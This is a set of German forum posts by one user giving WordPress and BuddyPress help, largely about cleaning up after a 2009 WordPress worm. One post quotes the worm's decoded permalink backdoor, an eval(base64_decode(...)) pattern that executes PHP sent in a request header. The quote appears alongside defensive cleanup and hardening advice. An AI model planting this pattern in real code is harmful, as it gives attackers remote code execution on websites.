Beiträge von glcknb

    Naja, die im Journey.etc-Artikel beschriebene Methode identifiziert den vermuteten Übeltäter eindeutig, während dem bei Deiner Vorgehensweise 3 Unschuldige über die Klinge springen mussten. Ich weiss nur, dass ich mich auf einer Website nicht wieder anmelden würde, wo mit mir so umgegangen wird, aber das muss jeder Webmaster für sich entscheiden.

    LG Domi

    PS. Siehe auch mein PN an Dich.

    Hallo, ja ich habe ja auch an der Methode nichts auszusetzen, ich wollte lediglich darauf hinweisen das es Gerüchte gibt (bzw der Link bestätigt es und in den Wordpress.org wurde es auch bestätigt) das die verschiedenen index.php in einzelnen Unterverzeichnissen auch manipuliert worden sind - und man damit halt selbst wenn man sein Blog wieder gereinigt hat jederzeit wieder infiziert werden könnte.

    Es ist vielleicht etwas paranoid, aber bei solchen großen Lücken mit sehr vielen möglichen Opfern gibt es vermutlich viele Trittbrettfahrer die den Code abändern oder sich geschickter anstellen etwas zu verschleiern. Größere Blogs haben eventuell auch das Problem das feindlich gesinnte Nutzer dies für eine spezielle Attacke nutzen. Deswegen habe ich das "über die Klinge springen" in Kauf genommen. Es muss natürlich jeder für sich abwägen. Jedenfalls grund zur Panik gibt es nicht, aber allzu leichtfertig sollte man so etwas auch nicht hinnehmen und schon einmal mal gründlich schauen ob es nicht noch versteckte Hintertüren gibt.

    Nichts für ungut.

    Das reicht leider noch nicht:
    laut: http://www.sourcesec.com/Lab/wordpress-hacked.html legt der Wurm an verschiedenen Stellen PHP-Dateien an, die das Blog erneut infizieren können.

    Die sicherste Variante wäre - Ein Backup aller Dateien und der Datenbank zu machen und vorallem auch auf das Änderungsdatum zu schauen.

    Wenn man auf Nr. Sicher gehen möchte alle Wordpress-Dateien löschen und aus sicherer Quelle neu installieren (2.8.4) und dann die Theme Datein / Plugins wieder hochladen (wenn man überprüft hat das in keiner der Dateien Code auf dem obigen Link ist, sollte aber nicht der Fall sein, die Änderungszeit kann hier auch helfen als Indikator)

    Sicherstellen das keine (feindlichen) Admin-User mehr in der Datenbank sind und möglichst auch keine unbekannten normalen User.

    Permalinks richtig stellen. neue Nutzer-Registrierungen sicherheitsalber kontrollieren - z.B. mit http://wordpress.org/extend/plugins/sabre/ oder http://wordpress.org/extend/plugins/register-plus/ (es ist nicht so richtig klar ob 2.8.4 wirklich sicher ist - die Lücke ist ihren Idee nach auf alle Dateien im Admin-Bereich anwendbar - so richtig scheint im Moment keiner zu wissen ob überall der Sicherheitscheck eingebaut wurde)

    Auch die wp-config.php ansehen, alle Verzeichnisse auf aktualisierte index.php mit Code aus dem Link überprüfen.

    Dann sollte man (hoffentlich) sicher sein.

    Die Nutzer entfernen alleine genügt nicht. Der Angreifer muss nur eine der manipulierten index.php Dateien aufrufen damit das Backdoor oder ein anderes Backdoor wieder aktiviert wird.

    Check mal ob deine IP hier auftaucht: http://www.spamhaus.org/lookup.lasso sowie hier: http://www.dnsbl.info/dnsbl-database-check.php
    (Ein Auftauchen in der PBL ist normal), wenn du häurig in anderen Listen neben der PBL drinstehst hast du ein Problem.

    Nutzt du Tor? Anonyme Proxies? Proxies? Einen (kostenlosen?) VPN-Service? Hast du deinen Referer auf irgend etwas seltsames gestellt? Ist dein Rechner Virenfrei?

    Wenn du das alles auschließen kannst dann eventuell mal ohne URL mit andere E-Mail kommentieren, eventuell hat ein oder mehrere Blog-Betreiber einen Kommentar von dir mit deiner E-Mail oder deiner URL als Spam markiert (warum auch immer :) und du wirst automatisch aussortiert.

    Emails kann man normalerweise auch als adresse+beliebertext@domain.tld schreiben, sie sollten trotzdem ankommen.

    Vielleicht interressiert es ja den ein oder anderen - Nachdem ich die beiden doch ziemlich "PANIK11!11elfcos(0)111" lastigen Postings bei mashable und lorelle gelesen habe und selbst (ja ich weiß) etliche Blogs habe die noch mit älteren Versionen laufen - hier ein paar Details aus den Kommentaren bei wordpress.org:


    • Es ist vermutlich ein Wurm, läuft also automatisiert ab.
    • Es wird zuerst ein User angelegt - also es ist davon auszugehen, dass jeder der Registrierungen erlaubt betroffen ist, ich habe noch nichts von Fällen gehört wo jemand Registrierungen deaktiviert hatte und betroffen war
    • Dann wird eine Sicherheitslücke ausgenutzt die es Nutzern mit geringeren Rechten (z.B. Subscriber) erlaubt Permalinks zu ändern.
    • Der Code in den Permalinks wird (wohl?) auch irgendwo ausgeführt und aktiviert vermutlich irgend eine Funktion oder erhöht die Rechte eines Users. (Edit: Es ist schlimmer Details siehe unten)
    • Per POST zur xmlrpc.php wird Code eingebunden der Dateien im Blog anlegt und den Code an ein paar Stellen einfügt/ändert.
    • Vermutlich war/ist eine späteres Nachladen von SPAM-Links/Bots geplant - die Lücke würde das ermöglichen, anscheind war der Weg über kaputte Permalinks die einzige Möglichkeit das auszunutzen
    • 2.8.4 ist anscheind sicher


    Wer nicht betroffen ist: Updaten!

    Wer schon betroffen ist: Updaten hilft nichts, der Wurm legt diverse index.php an die den Code zurück holen. Details dazu und anleitungen das Blog zu reinigen ohne Daten zu verlieren gibt es bei wordpress.org in den Foren.

    Wer nicht Updaten kann und noch nicht betroffen ist (warum auch immer):


    • User-Registrierungen verbieten
    • Alle Schreibrechte auf php-Dateien entfernen ( find . -iname "*.php" | xargs chmod 444 - wenn man shell zugang hat)
    • xmlrpc.php vorrübergehend umbennen per .htaccess Zugriff verbieten
    • Seine Nutzer durchgehen, alle die da nicht hingehören sofort löschen!
    • Eventuell Anmeldungen ganz verbieten (wp-login.php per htaccess sichern)
    • Einen Weg finden Upzudaten, die Lücke ist kritisch, selbst wenn der Wurm nicht vorbei kommt kann jeder angemeldeter Nutzer das Blog übernehmen/PHP-Code ausführen.


    Edit: Was macht der geänderte Permalink?

    Zitat von Wordpress.org:

    Zitat


    For anybody interested, having that particular code in your permalink is a backdoor.
    That decodes internally to this:
    /%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/
    Which, rather cleverly, causes any single post URL to look for a header called "HTTP_EXECCODE" sent by the client, run it through base64_decode, and then to execute the PHP code contained therein.
    In other words, with that on your site, anybody with a little bit of know-how can force your site to run arbitrary PHP code. Which is probably how they got in, after they somehow got your permalink URL to change to that (probably via SQL injection in old WP versions).

    Kurz und Knapp: Jeder kann - solange die Permalink URL nicht geändert ist - beliebigen PHP Code ausführen auf dem Blog!

    Also Permalink Ändern und am besten erstmal alles dicht machen - per .htaccess:

    Code
    order deny,allow
    deny  from all
    allow from <eigene ip>

    Ohne Gewähr soweit, Infos sind aus den wordpress.org Threads (http://wordpress.org/support/topic/297639). Morgen wird es hoffentlich ein wenig mehr Details geben.

    Die Zeile mit wp2 sieht merkwürdig aus.

    Apache Configuration
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>

    Eventuell die .htaccess mal ins Verzeichnis wp2 packen und RewriteBase /wp2 ranhängen.

    Hi,
    ist es irgendwie möglich (oder gibt es ein Plugin) wo man die Rechte besser verteilen kann? Als Beispiel möchte ich nicht, dass Gäste sehen was Nutzer gerade machen (side wide activity).

    So einfach geht das leider nicht. Wenn du dich mit PHP-Code auskennst kannst du mit Hilfe des Template-Tags is_user_logged_in() selbst in den Theme-Dateien änderungen vornehmen.

    Ich habe z.B. die Anzeige der Profile für nicht angemeldete Nutzer deaktiviert.

    für die Activites müsstest du dir die Stellen in den Theme-Files suchen wo sie Auftauchen z.b. in /wp-content/bp-themes/profile/index.php ab Zeile 47:

    PHP
    <?php while ( bp_activities() ) : bp_the_activity(); ?>
         <li class="<?php bp_activity_css_class() ?>">
                 <?php bp_activity_content() ?>
          </li>
      <?php endwhile; ?>

    daraus dann kannst do z.B. so was anderes Darstellen:

    Ohne Gewähr, aber mach dich mit dem Aufbau der Theme-Dateien vertraut - es gibt auch ein gut dokumentiertes "Skeleton-Theme" auf der Buddypress-Seite - jedoch vorsicht beim Updaten, wenn du keine halbwegs soliden PHP-Kenntnisse hast, dann warte lieber bis es eine saubere Lösung gibt.

    Zitat


    Ebenso fehlt mir noch eine nette kleine und schlanke Galerie, welche mit buddypress genutzt werden kann. Gibts denn da gar nix? :-?

    Danke!
    grüße :)

    Es gibt ein Plugin http://manojkumar.org/bppicture-album-plugin-for-buddypress/ aber ich kann nicht sagen wie brauchbar das ist.

    Viele Grüße

    Hallo,

    Anscheinend ist also das automatische rausfinden der Trackback-URL defekt. Gibts diesen Fehler überhaupt? Kann man Ihn beheben?

    Trackback ist quasi ein manuelles Pingback.

    Deine Header sollten so aussehen:

    HTTP
    % curl -I deineseite.de
    HTTP/1.1 200 OK
    Date: Mon, 31 Aug 2009 22:27:11 GMT
    Server: Apache
    X-Pingback: http://deineseite.de/xmlrpc.php
    Vary: Accept-Encoding,User-Agent
    Content-Type: text/html; charset=UTF-8

    Ich hatte das Problem auch schonmal, falls du Zugriff auf die PHP-Konfiguration oder die Apache Error-Files hast schaue da mal nach ob PHP nicht eventuell einen Fehler wirft wenn ein Pingback/Trackback eingeht.

    Ansonsten ist deine xmlrpc.php eventuell durch .htaccess gesichert?

    http://www.meetinx.de/trackback-fehl…nd-die-loesung/ könnte es auch sein.

    Hallo, danke für Deine Antwort. Mir geht es einfach nur darum. dass man im Quelltext nicht den kompletten pfad z.B. zu einem Video ablesen kann dass eigentlich rel. sicher in einer .swf Datei "liegt" - für normale Quelltextergebnisse einer html.index seite gibt es div. Möglichkeiten - mache ich ähnliches mit einer WP css kommt nur Gehächseltes hinten raus ...

    Hmm, ich würde ja gerne helfen aber ich verstehe leider immer noch nicht was zu tun möchtest. Ich bin aber schon ein wenig neugierig was sich hinter der kryptischen Beschreibung verbirgt.

    Zitat

    dass man im Quelltext nicht den kompletten pfad z.B. zu einem Video ablesen ann dass eigentlich rel. sicher in einer .swf Datei "liegt"

    Den Pfad kann man immer sehen, das Video muss ja erreicht werden. Um ein Downloaden des Videos oder ein aus dem Cache-Fischen zu verhindern gibt es ein paar Möglichkeit z.B. Cookies oder du leitest alle Videoanfragen über eine PHP-Datei z.b. watch.php?video=3 welche z.B. den Refererer oder den Cookie-Prüft z.b. um Direktlinks auf das Video zu unterbinden. Aber das hat mit Wordpress nichts zu tun (da müsste nur der Einbindungslink geändert werden) und lässt sich mit mittelmässigen Aufwand auch aushebeln. Aber für Zufallsfinder erschwert es das schonmal ein wenig. Vielleicht wissen ein paar andere hier Bescheid, warscheinlich ist die Frage auch in einem Flash-Forum besser aufgehoben.

    Zitat

    für normale Quelltextergebnisse einer html.index seite gibt es div. Möglichkeiten - mache ich ähnliches mit einer WP css kommt nur Gehächseltes hinten raus

    Was sind denn Quelltextergebnisse was ist eine html.index? Meinst du eine statische HTML-Seite? Was machst du da? Was willst du auf Wordpress übertragen? Wenn möglich wäre eine etwas genauere Beschreibung gut.

    Was hat eine .css Datei (die nur Layout und Gestaltungsinformationen beinhaltet) denn mit Links zu Videos zu tun? Was ist Gehächseltes? Die Seite wird falsch dargestellt? Es gibt PHP-Fehler?

    Ich würde dir raten (ist nicht bös gemeint) mal den folgenden Text in Ruhe durchzulesen: http://www.tty1.net/smart-questions_de.htmll damit steigen die Chancen dass dir jemand helfen kann um einiges. (Der Text ist vielleicht etwas harsch formuliert aber skizziert ganz gut wie man gute Fragen stellt)

    edit: Hier http://de.selfhtml.org/intro/technologien/index.htm gibt es eine gute kurze Erklärung für die gängigen Begriffe

    Hallo, guten Abend zusammen,

    für normale htm indexe usw gibt es ja diverse tools den quelltext zu verschleiern (pfade werde dargestellt etc.) - leider habe ich nichts entsprechendes für wp gefunden - ist jemandem etwas bekannt oder kennt jemand einen wirkungsvollen weg ????

    Es ist etwas unklar was du genau meinst - Möchtest du Verzeichnislistings verbieten? Dann musst in in die .htaccess folgendes hinzufügen:

    Code
    Options -Indexes

    Falls du deine PHP-Scripte schützen möchtest - eval und Konsorten sind eine schlechte Idee - Stelle die Dinge unter eine Vernünftige Lizens und mache Klar welche Rechte du gesichert haben möchtest - ansonsten sind die einzigen schwer oder gar nicht zu knacken Lösungen - so gut kenne ich mich da nicht aus - http://www.ioncube.com/ und Konsorten, dies dürfte aber für Wordpress gegen die GPL verstoßen.

    Falls es dir um HTML/JavaScript Quellcode geht -> Vergiss es, es lohnt sich nicht. Selbst wenn du einen Obfuscikator nutzt - Installiere dir dann einfach mal Firebug, der parsed und ordnet alles wieder ordentlich.

    JavaScript-Spielchen nerven auch nur, curl oder Noscript und Schwupps.

    Wenn du Angst um deine Inhalte oder dein Design hast, dann gibt es sicher Rechtlich Wirksame AGBs und Lizenzen die dir erlauben Diebe anzuzeigen und zu verfolgen.

    So ist das nunmal im Internet.

    Könnte mir das hier vielleicht auch jemand entschlüsseln ??

    Wäre ich sehr dankbar dafür !

    Hier der Code:
    http://pastebin.com/m479bc6b1

    Hier - ist noch ein Forex und Klingelton-Werbelink drin.

    Falls du eine Fehlermeldung bekommst wenn du es in eine eigene PHP Datei hängst noch ein:

    PHP
    include( './wp-blog-header.php' );

    ran, dadurch werden die Wordpress Funktionen verfügbar. (Wenn die Datei im Wordpress Verzeichnis liegt)

    Es ist übrigens perfekt Legal die Links zu ändern. Auf Wordpress.org gab es vor kurzem einen Eintrag demnach ist der PHP-Code Teil des Themes GPL d.h. du kannst den Code ändern - müsstest aber theorethisch den geänderten Code verfügbar machen, allerdings bei der GPL nicht zwingend wenn es nur auf der Website genutzt wird, das müsstest du bei der AGPL machen </gefährlicheshalbwissen>

    Obiges Links sind jedenfalls sehr fragwürdig.

    Hallo,

    ich habe mir mit einem Theme BP zurechgearbeitet und habe nun erfahren, das Buddypress angeblich noch nicht dazu geeignet ist mit einigen Usern eine sichere Plattform zu gewährleisten. Was meint Ihr wie sicher ist BP heute wenn man wirklich guten Traffic hat ? Habe auch gehört das bei jedem Update die Struktur geändeert is ....gibt es kein theme das mit upgedatet werden kann ?

    Es gibt schon ein paar größere Seiten die Buddypress nutzen z.B. flokka.com - eine VW Seite und ähnliches. Schau dir mal auf buddypress.org den Showcase an - da gibt es eine Menge größerer Seiten.

    Das mit den Updates und der Struktur ist schon generell so - Buddypress Intern sollte alles kompatibel bleiben - eventuell ändern sich ein paar Dinge in der API und Plugins haben Probleme - das sind aber meist kleinere Änderungen - ich bastel gerade auch einer Buddypress-Seite und oft hier und da gibt es öfter einen Bug. Die Themes ändern sich wohl auch mit 1.1 wie ich es gerade sehe.

    Auf jeden Fall würde ich dir raten mit einen Versionsverwaltungssystem (git, mercurial, svn) zu arbeiten und eine Test-Seite unter Produktionsbedingungen zu haben womit du erstmal die änderungen Einpflegen kannst.

    Darüber hinaus wenn möglich die Core-Dateien nicht anfassen wenn doch und es ist ein Bug dieses im Trac bei Buddypress melden, Bugs werden recht schnell gefixt. Bei Plugins ist es leider etwas komplizierter, das großartige Events-Plugins ist leider auch nicht sehr stabil.

    Aber wenn du ein halbwegs ehrfahrener PHP-Entwickler bist solltest du das alles ohne Probleme fixen können.

    Zitat


    Nun was ich machen möchte is, eine Art Online magazin, mit Userprofilen usw. wo die user dann selbst schreiben und verööfentlichen können...was meint Ihr oder soll ich noch zuwarten bevor ich mit Bp "aktiv" werde und es "produktiv" einsetzen kann ?

    Du könntest die Magazin-Elemente als Buddypress-Komponente entwickeln. Wäre sicher eine klasse Sache wenn es so etwas gäbe. Es gibt in der Richtung eventuell auch schon etwas - Das weiß ich nicht genau.

    In Sachen geschwindigkeit sollte es keine Probleme geben, es gibt Möglichkeit alles zu Cachen und auf meinen Vserver rennt Buddypress recht vernünftig mit Caching und gzip - <1s Ladezeit pro Seite

    Mit nginx, Caching, Last-Modified-Headern, APC, Object-Caching und gzip ist Buddypress wirklich fix. Load-Balancing und mehrere DB's gehen wohl auch relativ einfach - aber damit habe ich noch nie etwas zu tun gehabt. Allerdings ist es im Vergleich zu anderen CMS schon langsamer.

    Eine andere Variante wäre Django (basierend auf Python) und Pinax (http://pinaxproject.com/) oder Drupal (auch PHP) was auch User-Profile bietet und sehr mächtig ist und im Moment wohl den stabileren Code hat.

    Das würde wohl mehr Arbeit machen, aber du kannst dir alles Passend nach deinem Geschmack aufbauen. Buddypress ist zwar Modular aber sehr von Wordpress abhängig mit vielen Funktionen die man vielleicht nicht braucht. Und ich persönlich habe den Eindruck Django sowie Drupal sind viel besser dokumentiert und haben weniger Sicherheitsprobleme als das noch junge Buddypress

    Wobei man diese auch nicht wirklich vergleichen kann - Äpfel und Birnen - Aber für dein Szenario lohnt es sich vielleicht mal Django/Pinax und Drupal anzuschauen.

    Zitat


    Danke 100000fach für eure tipps und hinweise

    lg

    tony

    Viele Grüße
    glcknb

    Dies liesse sich mit RSS erledigen. Sollen die Posts denn immer verfügbar sein oder genügt es das die jeweils aktuellen auf einer Seite angezeigt werden?

    Es gibt ein Plugin was direkt RSS-Items als Posts einbindet, aber das ist vielleicht ein wenig Overkill für die Seite.

    Du könntest ein Kategorie Template erstellen und z.b. mit folgender Funktion die Seite holen:

    http://codex.wordpress.org/Function_Reference/fetch_feed

    Gibt sicher auch ein Plugin dafür auf die schnell habe ich das hier gefunden:

    http://wordpress.org/extend/plugins/selective-rss/

    Edit: Das setzt natürlich voraus, dass die Seite deines Freundes RSS-Feeds für die News-Artikel anbietet.

    Sollte das nicht der Fall sein wirds kompliziert, man könnte auch das HTML-Parsen aber da wäre es wohl einfacher der Seite deines Freundes RSS beizubringen

    hiho,
    zunächst find ich es klasse das so etwas wie buddypress von der opensource gemeinschaft entwickelt wird.

    Werkeln tu ich nu seit 2 Tagen an einem eigenen Buddypress, nach anfänglichen (typischen) schwierigkeiten wie 127.0.0.1 statt localhost verwenden (ich will erst mal dad ganze bei mit zu hause zum laufen bringen) so wie mod_rewrite richtig konfigurieren leuft das ganze auch schon recht gut.

    Leider gibt es aber noch einen fehler dem ich einfach nicht herr werde,
    bei ganz bestimmten seiten z.b. profil, blog's, mitglieder
    erscheint nur eine weiße seite :???:

    hab mich schon in google und hier im board umgeschaut aber keine geeignete lösung gefunden.

    Infos:
    Ubuntu, apache2, php5 (mod_rewrite aktiviert), mysql

    Hallo,

    Ich glaube Wordpress MU benötigt neben dem localhost domainnamen noch eine weitere Domain z.b. localhost.localdomain or beispiel.de (kannst du in die /etc/hosts eintragen)

    Ein weiße Seite sagt meist es gab einen Fehler in einem PHP Script.

    Bei Ubuntu sollte die php.ini in /etc/php/apache/php.ini oder /etc/php/cgi/php.ini liegen bzw ist der ort auch im phpinfo() befehl vermerkt.

    Dort gibt es eine Option error_reporting, da dein System ja nicht öffentlich läuft kannst du ruhig display_errors auf on schalten und alle Fehler anzeigen lassen (Die Datei ist ganz gut dokumentiert)

    Dann müsstest du eine mehr oder wenige aussagekräfte Fehlermeldung bekommen. Alternativ kannst du dir auch die Apache Access und Error logs ansehen in /var/www/apache/error_log bzw access_log (genauen namen weiß ich nicht aber da solltest du fündig werden)

    Am einfachsten mit tail -f <dateiname> wärend der Fehler auftritt.

    Wenn du damit ne Aussagekräftige Fehlermeldung hast dann poste hier am besten noch einmal. Weiße Seite kann wirklich alles sein :)

    Viele Grüße

    Hallo,

    also je nachdem wie die Vorlesung gehalten wird ist es meist sehr abstrakt - Neben dem "normalen" Büchern kann ich das Gelbe Rechenbuch empfehlen:

    http://www.amazon.de/Das-Gelbe-Rech…r/dp/3931645002

    http://www.amazon.de/Gelbe-Rechenbu…r/dp/3931645010

    Da ist die Theorie kurz erklärt und es gibt für jedes Problem durchgerechnete erklärte Lösungen - ist perfekt zur Klausurvorbereitung.

    gibt auch noch das hier:

    http://www.amazon.de/%C3%9Cbungsauf…n/dp/3540690727

    Ansonsten zur "reinen" Theorie ist der Heuser ganz gut - Da wird recht ausführlich erklärt:

    http://www.amazon.de/Lehrbuch-Analy…r/dp/3519622335

    Die Bücher sollte es günstig gebraucht geben, oder in der Bibliothek

    Ansonsten gibt es meist einen Vorkurs an der Uni - Lieber ein paar Aufgaben Rechnen als Lesen, mir hilft das immer mehr wenn es praktisch macht.

    Und Bücher kaufen wird ich mir noch nicht, leih dir lieber erstmal die Bücher die dich interressieren in der Bibo aus dann wirst du schon eines finden was dir liegt, dass kannst du dann günstig Kaufen, oft verkaufen auch ältere Semester oder Abbrecher ihre Bücher.

    Halli Hallo,
    ich suche momentan nach einer Möglichkeit den Inhalt verschiedener Wordpress-Blogs, die auf verschiedenen Server bzw. Webspacepaketen liegen über ein zentrales Interace zu verwalten.

    Was bedeutet Verwalten? Wenn du möglichst einfach und Stressfrei mehrere Beiträge in verschiedenen Blogs veröffentlichen möchtest würde sich die XML-Schnittstelle von Wordpress dafür eignen. Da gibt es eine recht große Anzahl von Clients

    http://codex.wordpress.org/Weblog_Client

    http://www.zoundryraven.com/ unterstützt z.B. mehrere Blogs.

    Zitat

    Ist das mit Wordpress MU möglich? - Wenn ja, gibt es Anleitungen zur Einrichtung eines solchen Netzwerkes?

    Wordpress MU läuft nur auf einen Server - Es gibt zwar die Möglichkeit Load-Balancing und mehrere Datenbanken zu verwenden aber das ist meist nur für sehr große Installation nötig. Und selbst dann wäre es jeweils die gleiche Oberfläche für jedes Blog - also du müsstet dich für die meisten Aufgaben in das jeweilige Blog-Backend einloggen. Allerdings in Sachen Plugins und Updates würdest du dir Arbeit sparen.

    Zitat


    Ich würde mich sehr freuen, wenn ich hier eine Lösung finden könnte.

    Viele Grüße und ein Dankeschön im Voraus,
    Chris92

    Vielleicht lohnt es sich auch noch bei http://wpmudev.org/ im Forum zu fragen.

    Viele Grüße
    glcknb

    Hallo,

    wir haben unseren Praktikanten darauf angesetzt und er hat das fleissigerweise am Stück übersetzt.

    Download MO&PO: http://sinntal.net/wordpress-mu-sprachdatei/

    Tausend Dank!

    Ich hätte noch eine "Sie" Übersetzung für Buddypress - Mit "Kontakte" anstatt "Freundschaft" und einigen anderen (kleineren) Änderungen, wenn jemand interresse hat bitte melden ich würde die Datei dann noch einmal Überarbeiten und zur Verfügung stellen.